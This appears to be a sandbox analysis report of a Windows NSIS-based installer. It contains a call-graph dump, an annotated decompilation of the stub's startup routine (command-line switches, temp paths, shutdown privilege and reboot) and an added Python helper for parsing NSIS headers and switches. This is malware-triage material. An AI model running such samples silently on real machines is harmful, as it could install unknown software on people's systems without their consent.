402434 4426 402467 4425->4426 4427 40243c 4425->4427 4429 402da6 17 API calls 4426->4429 4428 402de6 17 API calls 4427->4428 4430 402443 4428->4430 4431 40246e 4429->4431 4433 40247b 4430->4433 4434 402da6 17 API calls 4430->4434 4436 402e64 4431->4436 4435 402454 RegDeleteValueW RegCloseKey 4434->4435 4435->4433 4437 402e78 4436->4437 4439 402e71 4436->4439 4437->4439 4440 402ea9 4437->4440 4439->4433 4441 4064db RegOpenKeyExW 4440->4441 4442 402ed7 4441->4442 4443 402f81 4442->4443 4444 402ee7 RegEnumValueW 4442->4444 4448 402f0a 4442->4448 4443->4439 4445 402f71 RegCloseKey 4444->4445 4444->4448 4445->4443 4446 402f46 RegEnumKeyW 4447 402f4f RegCloseKey 4446->4447 4446->4448 4449 406a3b 5 API calls 4447->4449 4448->4445 4448->4446 4448->4447 4450 402ea9 6 API calls 4448->4450 4451 402f5f 4449->4451 4450->4448 4451->4443 4452 402f63 RegDeleteKeyW 4451->4452 4452->4443 4453 401735 4454 402da6 17 API calls 4453->4454 4455 40173c SearchPathW 4454->4455 4456 401757 4455->4456 4457 405037 GetDlgItem GetDlgItem 4458 405089 7 API calls 4457->4458 4469 4052ae 4457->4469 4459 405130 DeleteObject 4458->4459 4460 405123 SendMessageW 4458->4460 4461 405139 4459->4461 4460->4459 4463 405170 4461->4463 4464 4066ab 17 API calls 4461->4464 4462 405390 4466 40543c 4462->4466 4476 4053e9 SendMessageW 4462->4476 4500 4052a1 4462->4500 4465 4045ca 18 API calls 4463->4465 4470 405152 SendMessageW SendMessageW 4464->4470 4471 405184 4465->4471 4467 405446 SendMessageW 4466->4467 4468 40544e 4466->4468 4467->4468 4478 405460 ImageList_Destroy 4468->4478 4479 405467 4468->4479 4492 405477 4468->4492 4469->4462 4474 404f85 5 API calls 4469->4474 4491 40531d 4469->4491 4470->4461 4475 4045ca 18 API calls 4471->4475 4472 405382 SendMessageW 4472->4462 4473 404631 8 API calls 4477 40563d 4473->4477 4474->4491 4489 405195 4475->4489 4481 4053fe SendMessageW 4476->4481 4476->4500 4478->4479 4482 405470 GlobalFree 4479->4482 4479->4492 4480 4055f1 4485 405603 ShowWindow GetDlgItem ShowWindow 
4480->4485 4480->4500 4484 405411 4481->4484 4482->4492 4483 405270 GetWindowLongW SetWindowLongW 4486 405289 4483->4486 4493 405422 SendMessageW 4484->4493 4485->4500 4487 4052a6 4486->4487 4488 40528e ShowWindow 4486->4488 4510 4045ff SendMessageW 4487->4510 4509 4045ff SendMessageW 4488->4509 4489->4483 4490 4051e8 SendMessageW 4489->4490 4494 40526b 4489->4494 4497 405226 SendMessageW 4489->4497 4498 40523a SendMessageW 4489->4498 4490->4489 4491->4462 4491->4472 4492->4480 4499 405005 4 API calls 4492->4499 4504 4054b2 4492->4504 4493->4466 4494->4483 4494->4486 4497->4489 4498->4489 4499->4504 4500->4473 4501 4055bc 4502 4055c7 InvalidateRect 4501->4502 4505 4055d3 4501->4505 4502->4505 4503 4054e0 SendMessageW 4508 4054f6 4503->4508 4504->4503 4504->4508 4505->4480 4511 404f40 4505->4511 4507 40556a SendMessageW SendMessageW 4507->4508 4508->4501 4508->4507 4509->4500 4510->4469 4514 404e77 4511->4514 4513 404f55 4513->4480 4515 404e90 4514->4515 4516 4066ab 17 API calls 4515->4516 4517 404ef4 4516->4517 4518 4066ab 17 API calls 4517->4518 4519 404eff 4518->4519 4520 4066ab 17 API calls 4519->4520 4521 404f15 lstrlenW wsprintfW SetDlgItemTextW 4520->4521 4521->4513 4522 401d38 4523 402d84 17 API calls 4522->4523 4524 401d3f 4523->4524 4525 402d84 17 API calls 4524->4525 4526 401d4b GetDlgItem 4525->4526 4527 402638 4526->4527 4528 4014b8 4529 4014be 4528->4529 4530 401389 2 API calls 4529->4530 4531 4014c6 4530->4531 4532 40473a lstrlenW 4533 404759 4532->4533 4534 40475b WideCharToMultiByte 4532->4534 4533->4534 4535 404abb 4536 404ae7 4535->4536 4537 404af8 4535->4537 4596 405cb2 GetDlgItemTextW 4536->4596 4539 404b04 GetDlgItem 4537->4539 4545 404b63 4537->4545 4542 404b18 4539->4542 4540 404c47 4546 404df6 4540->4546 4598 405cb2 GetDlgItemTextW 4540->4598 4541 404af2 4543 4068f5 5 API calls 4541->4543 4544 404b2c SetWindowTextW 4542->4544 4549 405fe8 4 API calls 4542->4549 4543->4537 4550 4045ca 18 API calls 4544->4550 4545->4540 4545->4546 4551 4066ab 
17 API calls 4545->4551 4548 404631 8 API calls 4546->4548 4553 404e0a 4548->4553 4554 404b22 4549->4554 4555 404b48 4550->4555 4556 404bd7 SHBrowseForFolderW 4551->4556 4552 404c77 4557 406045 18 API calls 4552->4557 4554->4544 4561 405f3d 3 API calls 4554->4561 4558 4045ca 18 API calls 4555->4558 4556->4540 4559 404bef CoTaskMemFree 4556->4559 4560 404c7d 4557->4560 4562 404b56 4558->4562 4563 405f3d 3 API calls 4559->4563 4599 40666e lstrcpynW 4560->4599 4561->4544 4597 4045ff SendMessageW 4562->4597 4565 404bfc 4563->4565 4568 404c33 SetDlgItemTextW 4565->4568 4572 4066ab 17 API calls 4565->4572 4567 404b5c 4570 406a3b 5 API calls 4567->4570 4568->4540 4569 404c94 4571 406a3b 5 API calls 4569->4571 4570->4545 4578 404c9b 4571->4578 4574 404c1b lstrcmpiW 4572->4574 4573 404cdc 4600 40666e lstrcpynW 4573->4600 4574->4568 4575 404c2c lstrcatW 4574->4575 4575->4568 4577 404ce3 4579 405fe8 4 API calls 4577->4579 4578->4573 4583 405f89 2 API calls 4578->4583 4584 404d34 4578->4584 4580 404ce9 GetDiskFreeSpaceW 4579->4580 4582 404d0d MulDiv 4580->4582 4580->4584 4582->4584 4583->4578 4585 404da5 4584->4585 4587 404f40 20 API calls 4584->4587 4586 404dc8 4585->4586 4588 40140b 2 API calls 4585->4588 4601 4045ec EnableWindow 4586->4601 4589 404d92 4587->4589 4588->4586 4591 404da7 SetDlgItemTextW 4589->4591 4592 404d97 4589->4592 4591->4585 4594 404e77 20 API calls 4592->4594 4593 404de4 4593->4546 4595 404a14 SendMessageW 4593->4595 4594->4585 4595->4546 4596->4541 4597->4567 4598->4552 4599->4569 4600->4577 4601->4593 4602 40263e 4603 402652 4602->4603 4604 40266d 4602->4604 4605 402d84 17 API calls 4603->4605 4606 402672 4604->4606 4607 40269d 4604->4607 4613 402659 4605->4613 4608 402da6 17 API calls 4606->4608 4609 402da6 17 API calls 4607->4609 4610 402679 4608->4610 4611 4026a4 lstrlenW 4609->4611 4619 406690 WideCharToMultiByte 4610->4619 4611->4613 4616 40623f 5 API calls 4613->4616 4617 4026e7 4613->4617 4618 4026d1 4613->4618 4614 40268d lstrlenA 4614->4613 
4615 406210 WriteFile 4615->4617 4616->4618 4618->4615 4618->4617 4619->4614

Control-flow Graph

• Executed
• Not Executed

[Control-flow graph of _entry_, blocks 0x403646 through 0x403c25; the block/edge list is omitted. Calls in block order: SetErrorMode, GetVersionExW (twice), lstrlenA, import #17 by ordinal (likely comctl32's InitCommonControls, which the NSIS stub calls at this point), OleInitialize, SHGetFileInfoW, GetCommandLineW, CharNextW, GetTempPathW, GetWindowsDirectoryW, lstrcatW, SetEnvironmentVariableW (twice), DeleteFileW, ExitProcess, OleUninitialize, GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, ExitWindowsEx (the reboot-on-exit path), lstrcmpiW, SetCurrentDirectoryW, CopyFileW, CloseHandle.]
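The entry-point graph above and the decompiled _entry_ that follows are the startup path of an NSIS (Nullsoft) installer stub: the "NSIS Error" and "Error writing temporary file" strings, the scan of GetCommandLineW for the /S, /NCRC and /D= switches, and the GetTempPathW staging are all standard stub behaviour. That matters for triage because the dropped executable can be detonated silently with /S and redirected with /D= without patching it. The Python below is an added example written for this page; it is not code from the report, from Joe Sandbox or from NSIS. It locates the NSIS first header in a file by its documented signature (flags, 0xDEADBEEF, "NullsoftInst"; the flag names come from the NSIS source) and emulates the switch parsing the way the decompiled loop does it (a token's delimiter is a space or, for a quoted token, the closing double quote; /S and /NCRC only count when the delimiter or end of string follows immediately; /D= must be preceded by a space and consumes the rest of the line). The sample overlay bytes and command lines are constructed for the demonstration, the file name "sample.exe" is made up, and the 512-byte alignment check assumes the stub's block-wise self-read, which this report does not show.

```python
"""Triage helpers for an NSIS installer stub (added example, not report code)."""
import struct

# NSIS firstheader layout (from the NSIS source): int flags; int siginfo (0xDEADBEEF);
# int nsinst[3] ("Null", "soft", "Inst"); int length_of_header; int length_of_all_following_data
NSIS_SIG = b"\xEF\xBE\xAD\xDE" + b"NullsoftInst"
FH_FLAGS = {1: "UNINSTALL", 2: "SILENT", 4: "NO_CRC", 8: "FORCE_CRC"}


def find_nsis_header(data: bytes):
    """Locate the NSIS first header in a PE image or overlay; None if absent."""
    idx = data.find(NSIS_SIG)
    if idx < 4 or idx + len(NSIS_SIG) + 8 > len(data):
        return None
    off = idx - 4                                    # the flags DWORD precedes the signature
    (flags,) = struct.unpack_from("<I", data, off)
    hdr_len, data_len = struct.unpack_from("<II", data, idx + len(NSIS_SIG))
    return {
        "offset": off,
        # assumption: the stub reads itself in 512-byte blocks and tests only the block
        # start, so a header the stub would accept sits on a 512-byte boundary
        "aligned": off % 512 == 0,
        "flags": [name for bit, name in FH_FLAGS.items() if flags & bit],
        "header_len": hdr_len,
        "data_len": data_len,
    }


def parse_nsis_switches(cmdline: str) -> dict:
    """Emulate the command-line scan seen in the decompiled _entry_.

    argv[0] is skipped (quoted or not); each later token is delimited by a space,
    or by '"' if it starts with one; '/S' and '/NCRC' count only when the delimiter
    (or end of string) follows immediately; ' /D=' must be preceded by a space and
    takes everything to the end of the line, spaces included and unquoted.
    """
    out = {"silent": False, "ncrc": False, "instdir": None}
    n = len(cmdline)
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        p = n if end < 0 else end + 1
    else:
        end = cmdline.find(" ")
        p = n if end < 0 else end
    while p < n:
        while p < n and cmdline[p] == " ":
            p += 1
        if p >= n:
            break
        seek = " "
        if cmdline[p] == '"':
            seek = '"'
            p += 1
        if cmdline[p:p + 1] == "/":
            q = p + 1
            if cmdline[q:q + 1] == "S" and cmdline[q + 1:q + 2] in ("", seek):
                out["silent"] = True
            if cmdline[q:q + 4] == "NCRC" and cmdline[q + 4:q + 5] in ("", seek):
                out["ncrc"] = True
            if cmdline[q:q + 2] == "D=" and p > 0 and cmdline[p - 1] == " ":
                out["instdir"] = cmdline[q + 2:]     # rest of the line, like the stub
                break
        end = cmdline.find(seek, p)
        p = n if end < 0 else end + (1 if seek == '"' else 0)
    return out


def build_sample_stub(flags: int, header_len: int = 0x40, data_len: int = 0x100) -> bytes:
    """Constructed stand-in for a dropped stub: a 512-byte dummy 'MZ' prefix (not a
    real PE) followed by an NSIS first header and zero-filled compressed data."""
    prefix = b"MZ" + b"\x00" * (512 - 2)
    first_header = struct.pack("<I", flags) + NSIS_SIG + struct.pack("<II", header_len, data_len)
    return prefix + first_header + b"\x00" * data_len


if __name__ == "__main__":
    sample = build_sample_stub(flags=2 | 4)           # SILENT | NO_CRC baked into the header
    print(find_nsis_header(sample))
    # constructed command line using the sandbox's temp directory from the report
    print(parse_nsis_switches(r'"C:\Users\Albus\AppData\Local\Temp\sample.exe" /S /NCRC /D=C:\Program Files\Target'))
```

Run it against a real dropped file by reading it into `data` and calling `find_nsis_header(data)`; a missing or unaligned header means the file is not a stock NSIS stub and the /S and /D= shortcuts should not be relied on. Note that `/SILENT` does not set the silent flag, because the character after `S` must be the delimiter, and that a quoted `"/D=..."` is ignored, because the character before the slash must be a space.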
                                                        C-Code - Quality: 78%
                                                        			_entry_() {
                                                        				WCHAR* _v8;
                                                        				signed int _v12;
                                                        				void* _v16;
                                                        				signed int _v20;
                                                        				int _v24;
                                                        				int _v28;
                                                        				struct _TOKEN_PRIVILEGES _v40;
                                                        				signed char _v42;
                                                        				int _v44;
                                                        				signed int _v48;
                                                        				intOrPtr _v278;
                                                        				signed short _v310;
                                                        				struct _OSVERSIONINFOW _v324;
                                                        				struct _SHFILEINFOW _v1016;
                                                        				intOrPtr* _t88;
                                                        				intOrPtr* _t94;
                                                        				void _t97;
                                                        				void* _t116;
                                                        				WCHAR* _t118;
                                                        				signed int _t119;
                                                        				intOrPtr* _t123;
                                                        				void* _t137;
                                                        				void* _t143;
                                                        				void* _t148;
                                                        				void* _t152;
                                                        				void* _t157;
                                                        				signed int _t167;
                                                        				void* _t170;
                                                        				void* _t175;
                                                        				intOrPtr _t177;
                                                        				intOrPtr _t178;
                                                        				intOrPtr* _t179;
                                                        				int _t188;
                                                        				void* _t189;
                                                        				void* _t198;
                                                        				signed int _t204;
                                                        				signed int _t209;
                                                        				signed int _t214;
                                                        				int* _t218;
                                                        				signed int _t226;
                                                        				signed int _t229;
                                                        				CHAR* _t231;
                                                        				signed int _t233;
                                                        				WCHAR* _t234;
                                                        
                                                        				0x7b3000 = 0x20;
                                                        				_t188 = 0;
                                                        				_v24 = 0;
                                                        				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                                                        				_v20 = 0;
                                                        				SetErrorMode(0x8001); // executed
                                                        				_v324.szCSDVersion = 0;
                                                        				_v48 = 0;
                                                        				_v44 = 0;
                                                        				_v324.dwOSVersionInfoSize = 0x11c; // 0x11c == sizeof(OSVERSIONINFOEXW)
                                                        				if(GetVersionExW( &_v324) == 0) {
                                                        					_v324.dwOSVersionInfoSize = 0x114; // retry with the plain OSVERSIONINFOW (0x114) when the EX form is rejected
                                                        					GetVersionExW( &_v324);
                                                        					asm("sbb eax, eax");
                                                        					_v42 = 4;
                                                        					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                                                        				}
                                                        				if(_v324.dwMajorVersion < 0xa) {
                                                        					_v310 = _v310 & 0x00000000;
                                                        				}
                                                        				 *0x7a8b58 = _v324.dwBuildNumber;
                                                        				 *0x7a8b5c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                                                        				if( *0x7a8b5e != 0x600) { // skipped on OS version 6.0; 0x7a8b5c holds the packed version built above
                                                        					_t179 = E00406A3B(_t188); // E00406A3B appears to resolve an API by table index
                                                        					if(_t179 != _t188) {
                                                        						 *_t179(0xc00); // 0xc00 == LOAD_LIBRARY_SEARCH_SYSTEM32 | LOAD_LIBRARY_SEARCH_USER_DIRS, the SetDefaultDllDirectories mask the NSIS stub sets against DLL search-order hijacking
                                                        					}
                                                        				}
                                                        				_t231 = "UXTHEME";
                                                        				do { // walk a NUL-separated list of DLL names starting with "UXTHEME"; the NSIS stub preloads these from the system directory for the same reason
                                                        					E004069CB(_t231); // executed
                                                        					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
                                                        				} while ( *_t231 != 0);
                                                        				E00406A3B(0xb);
                                                        				 *0x7a8aa4 = E00406A3B(9);
                                                        				_t88 = E00406A3B(7);
                                                        				if(_t88 != _t188) {
                                                        					_t88 =  *_t88(0x1e);
                                                        					if(_t88 != 0) {
                                                        						 *0x7a8b5c =  *0x7a8b5c | 0x00000080;
                                                        					}
                                                        				}
                                                        				__imp__#17();
                                                        				__imp__OleInitialize(_t188); // executed
                                                        				 *0x7a8b60 = _t88;
                                                        				SHGetFileInfoW(0x79ff48, _t188,  &_v1016, 0x2b4, _t188); // executed; 0x2b4 == sizeof(SHFILEINFOW)
                                                        				E0040666E(0x7a7aa0, L"NSIS Error");
                                                        				E0040666E(0x7b3000, GetCommandLineW()); // copy the raw command line into the 0x7b3000 buffer
                                                        				_t94 = 0x7b3000;
                                                        				_t233 = 0x22; // '"'
                                                        				 *0x7a8aa0 = 0x400000;
                                                        				if( *0x7b3000 == _t233) {
                                                        					_t94 = 0x7b3002; // argv[0] is quoted: start scanning after the opening quote
                                                        				}
                                                        				_t198 = CharNextW(E00405F6A(_t94, 0x7b3000)); // skip argv[0]; _t198 now points at the first switch token
                                                        				_v16 = _t198;
                                                        				while(1) {
                                                        					_t97 =  *_t198;
                                                        					_t251 = _t97 - _t188;
                                                        					if(_t97 == _t188) {
                                                        						break;
                                                        					}
                                                        					_t209 = 0x20; // ' ': default token delimiter
                                                        					__eflags = _t97 - _t209;
                                                        					if(_t97 != _t209) {
                                                        						L17:
                                                        						__eflags =  *_t198 - _t233;
                                                        						_v12 = _t209;
                                                        						if( *_t198 == _t233) {
                                                        							_v12 = _t233; // token starts with '"': the closing quote becomes the delimiter
                                                        							_t198 = _t198 + 2;
                                                        							__eflags = _t198;
                                                        						}
                                                        						__eflags =  *_t198 - 0x2f; // '/': switch prefix
                                                        						if( *_t198 != 0x2f) {
                                                        							L32:
                                                        							_t198 = E00405F6A(_t198, _v12);
                                                        							__eflags =  *_t198 - _t233;
                                                        							if(__eflags == 0) {
                                                        								_t198 = _t198 + 2;
                                                        								__eflags = _t198;
                                                        							}
                                                        							continue;
                                                        						} else {
                                                        							_t198 = _t198 + 2;
                                                        							__eflags =  *_t198 - 0x53; // 'S': the /S (silent install) switch
                                                        							if( *_t198 != 0x53) {
                                                        								L24:
                                                        								asm("cdq");
                                                        								asm("cdq");
                                                        								_t214 = L"NCRC" & 0x0000ffff; // /NCRC (skip the CRC check): the token's four WCHARs are compared against "NCRC" as two DWORDs
                                                        								asm("cdq");
                                                        								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
                                                        								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
                                                        								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
                                                        									L29:
                                                        									asm("cdq");
                                                        									asm("cdq");
                                                        									_t209 = L" /D=" & 0x0000ffff; // " /D=" (install directory): matched two WCHARs back, so a space must precede the slash
                                                        									asm("cdq");
                                                        									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
                                                        									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
                                                        									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
                                                        										L31:
                                                        										_t233 = 0x22;
                                                        										goto L32;
                                                        									}
                                                        									__eflags =  *_t198 - _t229;
                                                        									if( *_t198 == _t229) {
                                                        										 *(_t198 - 4) = _t188;
                                                        										__eflags = _t198;
                                                        										E0040666E(0x7b3800, _t198);
                                                        										L37:
                                                        										_t234 = L"C:\\Users\\Albus\\AppData\\Local\\Temp\\";
                                                        										GetTempPathW(0x400, _t234);
                                                        										_t116 = E00403615(_t198, _t251);
                                                        										_t252 = _t116;
                                                        										if(_t116 != 0) {
                                                        											L40:
                                                        											DeleteFileW(L"1033"); // executed
                                                        											_t118 = E004030D0(_t254, _v20); // executed
                                                        											_v8 = _t118;
                                                        											if(_t118 != _t188) {
                                                        												L68:
                                                        												ExitProcess(); // executed
                                                        												__imp__OleUninitialize(); // executed
                                                        												if(_v8 == _t188) {
                                                        													if( *0x7a8b34 == _t188) {
                                                        														L77:
                                                        														_t119 =  *0x7a8b4c;
                                                        														if(_t119 != 0xffffffff) {
                                                        															_v24 = _t119;
                                                        														}
                                                        														ExitProcess(_v24);
                                                        													}
                                                        													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                                                        														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
                                                        														_v40.PrivilegeCount = 1;
                                                        														_v28 = 2;
                                                        														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
                                                        													}
                                                        													_t123 = E00406A3B(4);
                                                        													if(_t123 == _t188) {
                                                        														L75:
                                                        														if(ExitWindowsEx(2, 0x80040002) != 0) {
                                                        															goto L77;
                                                        														}
                                                        														goto L76;
                                                        													} else {
                                                        														_push(0x80040002);
                                                        														_push(0x25);
                                                        														_push(_t188);
                                                        														_push(_t188);
                                                        														_push(_t188);
                                                        														if( *_t123() == 0) {
                                                        															L76:
                                                        															E0040140B(9);
                                                        															goto L77;
                                                        														}
                                                        														goto L75;
                                                        													}
                                                        												}
                                                        												E00405CCE(_v8, 0x200010);
                                                        												ExitProcess(2);
                                                        											}
                                                        											if( *0x7a8abc == _t188) {
                                                        												L51:
                                                        												 *0x7a8b4c =  *0x7a8b4c | 0xffffffff;
                                                        												_v24 = E00403D1D(_t264);
                                                        												goto L68;
                                                        											}
                                                        											_t218 = E00405F6A(0x7b3000, _t188);
                                                        											if(_t218 < 0x7b3000) {
                                                        												L48:
                                                        												_t263 = _t218 - 0x7b3000;
                                                        												_v8 = L"Error launching installer";
                                                        												if(_t218 < 0x7b3000) {
                                                        													_t189 = E00405C39(__eflags);
                                                        													lstrcatW(_t234, L"~nsu");
                                                        													__eflags = _t189;
                                                        													if(_t189 != 0) {
                                                        														lstrcatW(_t234, "A");
                                                        													}
                                                        													lstrcatW(_t234, L".tmp");
                                                        													_t137 = lstrcmpiW(_t234, 0x7b4800);
                                                        													__eflags = _t137;
                                                        													if(_t137 == 0) {
                                                        														L67:
                                                        														_t188 = 0;
                                                        														__eflags = 0;
                                                        														goto L68;
                                                        													} else {
                                                        														__eflags = _t189;
                                                        														_push(_t234);
                                                        														if(_t189 == 0) {
                                                        															E00405C1C();
                                                        														} else {
                                                        															E00405B9F();
                                                        														}
                                                        														SetCurrentDirectoryW(_t234);
                                                        														__eflags =  *0x7b3800;
                                                        														if( *0x7b3800 == 0) {
                                                        															E0040666E(0x7b3800, 0x7b4800);
                                                        														}
                                                        														E0040666E(0x7a9000, _v16);
                                                        														_t201 = "A" & 0x0000ffff;
                                                        														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                        														__eflags = _t143;
                                                        														_v12 = 0x1a;
                                                        														 *0x7a9800 = _t143;
                                                        														do {
                                                        															E004066AB(0, 0x79f748, _t234, 0x79f748,  *((intOrPtr*)( *0x7a8ab0 + 0x120)));
                                                        															DeleteFileW(0x79f748);
                                                        															__eflags = _v8;
                                                        															if(_v8 != 0) {
                                                        																_t148 = CopyFileW(0x7b6800, 0x79f748, 1);
                                                        																__eflags = _t148;
                                                        																if(_t148 != 0) {
                                                        																	E0040642E(_t201, 0x79f748, 0);
                                                        																	E004066AB(0, 0x79f748, _t234, 0x79f748,  *((intOrPtr*)( *0x7a8ab0 + 0x124)));
                                                        																	_t152 = E00405C51(0x79f748);
                                                        																	__eflags = _t152;
                                                        																	if(_t152 != 0) {
                                                        																		CloseHandle(_t152);
                                                        																		_v8 = 0;
                                                        																	}
                                                        																}
                                                        															}
                                                        															 *0x7a9800 =  *0x7a9800 + 1;
                                                        															_t61 =  &_v12;
                                                        															 *_t61 = _v12 - 1;
                                                        															__eflags =  *_t61;
                                                        														} while ( *_t61 != 0);
                                                        														E0040642E(_t201, _t234, 0);
                                                        														goto L67;
                                                        													}
                                                        												}
                                                        												 *_t218 = _t188;
                                                        												_t221 =  &(_t218[2]);
                                                        												_t157 = E00406045(_t263,  &(_t218[2]));
                                                        												_t264 = _t157;
                                                        												if(_t157 == 0) {
                                                        													goto L68;
                                                        												}
                                                        												E0040666E(0x7b3800, _t221);
                                                        												E0040666E(0x7b4000, _t221);
                                                        												_v8 = _t188;
                                                        												goto L51;
                                                        											}
                                                        											asm("cdq");
                                                        											asm("cdq");
                                                        											asm("cdq");
                                                        											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                        											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
                                                        											while( *_t218 != _t204 || _t218[1] != _t167) {
                                                        												_t218 = _t218;
                                                        												if(_t218 >= 0x7b3000) {
                                                        													continue;
                                                        												}
                                                        												break;
                                                        											}
                                                        											_t188 = 0;
                                                        											goto L48;
                                                        										}
                                                        										GetWindowsDirectoryW(_t234, 0x3fb);
                                                        										lstrcatW(_t234, L"\\Temp");
                                                        										_t170 = E00403615(_t198, _t252);
                                                        										_t253 = _t170;
                                                        										if(_t170 != 0) {
                                                        											goto L40;
                                                        										}
                                                        										GetTempPathW(0x3fc, _t234);
                                                        										lstrcatW(_t234, L"Low");
                                                        										SetEnvironmentVariableW(L"TEMP", _t234);
                                                        										SetEnvironmentVariableW(L"TMP", _t234);
                                                        										_t175 = E00403615(_t198, _t253);
                                                        										_t254 = _t175;
                                                        										if(_t175 == 0) {
                                                        											goto L68;
                                                        										}
                                                        										goto L40;
                                                        									}
                                                        									goto L31;
                                                        								}
                                                        								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
                                                        								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
                                                        									goto L29;
                                                        								}
                                                        								_t177 =  *((intOrPtr*)(_t198 + 8));
                                                        								__eflags = _t177 - 0x20;
                                                        								if(_t177 == 0x20) {
                                                        									L28:
                                                        									_t36 =  &_v20;
                                                        									 *_t36 = _v20 | 0x00000004;
                                                        									__eflags =  *_t36;
                                                        									goto L29;
                                                        								}
                                                        								__eflags = _t177 - _t188;
                                                        								if(_t177 != _t188) {
                                                        									goto L29;
                                                        								}
                                                        								goto L28;
                                                        							}
                                                        							_t178 =  *((intOrPtr*)(_t198 + 2));
                                                        							__eflags = _t178 - _t209;
                                                        							if(_t178 == _t209) {
                                                        								L23:
                                                        								 *0x7a8b40 = 1;
                                                        								goto L24;
                                                        							}
                                                        							__eflags = _t178 - _t188;
                                                        							if(_t178 != _t188) {
                                                        								goto L24;
                                                        							}
                                                        							goto L23;
                                                        						}
                                                        					} else {
                                                        						goto L16;
                                                        					}
                                                        					do {
                                                        						L16:
                                                        						_t198 = _t198 + 2;
                                                        						__eflags =  *_t198 - _t209;
                                                        					} while ( *_t198 == _t209);
                                                        					goto L17;
                                                        				}
                                                        				goto L37;
                                                        			}

                                                        0x00403654
                                                        0x00403655
                                                        0x0040365c
                                                        0x0040365f
                                                        0x00403666
                                                        0x00403669
                                                        0x0040367c
                                                        0x00403682
                                                        0x00403685
                                                        0x00403688
                                                        0x00403696
                                                        0x0040369e
                                                        0x004036a9
                                                        0x004036c2
                                                        0x004036c4
                                                        0x004036cc
                                                        0x004036cc
                                                        0x004036d7
                                                        0x004036d9
                                                        0x004036d9
                                                        0x004036ee
                                                        0x00403713
                                                        0x00403721
                                                        0x00403724
                                                        0x0040372b
                                                        0x00403732
                                                        0x00403732
                                                        0x0040372b
                                                        0x00403734
                                                        0x00403739
                                                        0x0040373a
                                                        0x00403746
                                                        0x0040374a
                                                        0x00403751
                                                        0x0040375f
                                                        0x00403764
                                                        0x0040376b
                                                        0x0040376f
                                                        0x00403773
                                                        0x00403775
                                                        0x00403775
                                                        0x00403773
                                                        0x0040377c
                                                        0x00403783
                                                        0x00403789
                                                        0x004037a1
                                                        0x004037b1
                                                        0x004037c3
                                                        0x004037ca
                                                        0x004037cc
                                                        0x004037cd
                                                        0x004037de
                                                        0x004037e2
                                                        0x004037e2
                                                        0x004037f5
                                                        0x004037f7
                                                        0x004038f1
                                                        0x004038f1
                                                        0x004038f4
                                                        0x004038f7
                                                        0x00000000
                                                        0x00000000
                                                        0x00403801
                                                        0x00403802
                                                        0x00403805
                                                        0x0040380e
                                                        0x0040380e
                                                        0x00403811
                                                        0x00403814
                                                        0x00403817
                                                        0x0040381a
                                                        0x0040381a
                                                        0x0040381a
                                                        0x0040381b
                                                        0x0040381f
                                                        0x004038df
                                                        0x004038e8
                                                        0x004038ea
                                                        0x004038ed
                                                        0x004038f0
                                                        0x004038f0
                                                        0x004038f0
                                                        0x00000000
                                                        0x00403825
                                                        0x00403826
                                                        0x00403827
                                                        0x0040382b
                                                        0x00403845
                                                        0x0040384c
                                                        0x0040385f
                                                        0x00403860
                                                        0x00403875
                                                        0x0040387a
                                                        0x0040387c
                                                        0x0040387e
                                                        0x0040389a
                                                        0x004038a1
                                                        0x004038b4
                                                        0x004038b5
                                                        0x004038ca
                                                        0x004038d0
                                                        0x004038d2
                                                        0x004038d4
                                                        0x004038dc
                                                        0x004038de
                                                        0x00000000
                                                        0x004038de
                                                        0x004038d8
                                                        0x004038da
                                                        0x004038ff
                                                        0x00403903
                                                        0x0040390c
                                                        0x00403911
                                                        0x00403917
                                                        0x00403922
                                                        0x00403924
                                                        0x00403929
                                                        0x0040392b
                                                        0x00403983
                                                        0x00403988
                                                        0x00403991
                                                        0x00403998
                                                        0x0040399b
                                                        0x00403b72
                                                        0x00403b72
                                                        0x00403b77
                                                        0x00403b80
                                                        0x00403b9d
                                                        0x00403c15
                                                        0x00403c15
                                                        0x00403c1d
                                                        0x00403c1f
                                                        0x00403c1f
                                                        0x00403c25
                                                        0x00403c25
                                                        0x00403bb4
                                                        0x00403bc0
                                                        0x00403bd1
                                                        0x00403bd8
                                                        0x00403bdf
                                                        0x00403bdf
                                                        0x00403be7
                                                        0x00403bf3
                                                        0x00403c01
                                                        0x00403c0c
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00403bf5
                                                        0x00403bf5
                                                        0x00403bf6
                                                        0x00403bf8
                                                        0x00403bf9
                                                        0x00403bfa
                                                        0x00403bff
                                                        0x00403c0e
                                                        0x00403c10
                                                        0x00000000
                                                        0x00403c10
                                                        0x00000000
                                                        0x00403bff

                                                        APIs
                                                        • SetErrorMode.KERNELBASE(00008001), ref: 00403669
                                                        • GetVersionExW.KERNEL32(?), ref: 00403692
                                                        • GetVersionExW.KERNEL32(0000011C), ref: 004036A9
                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403740
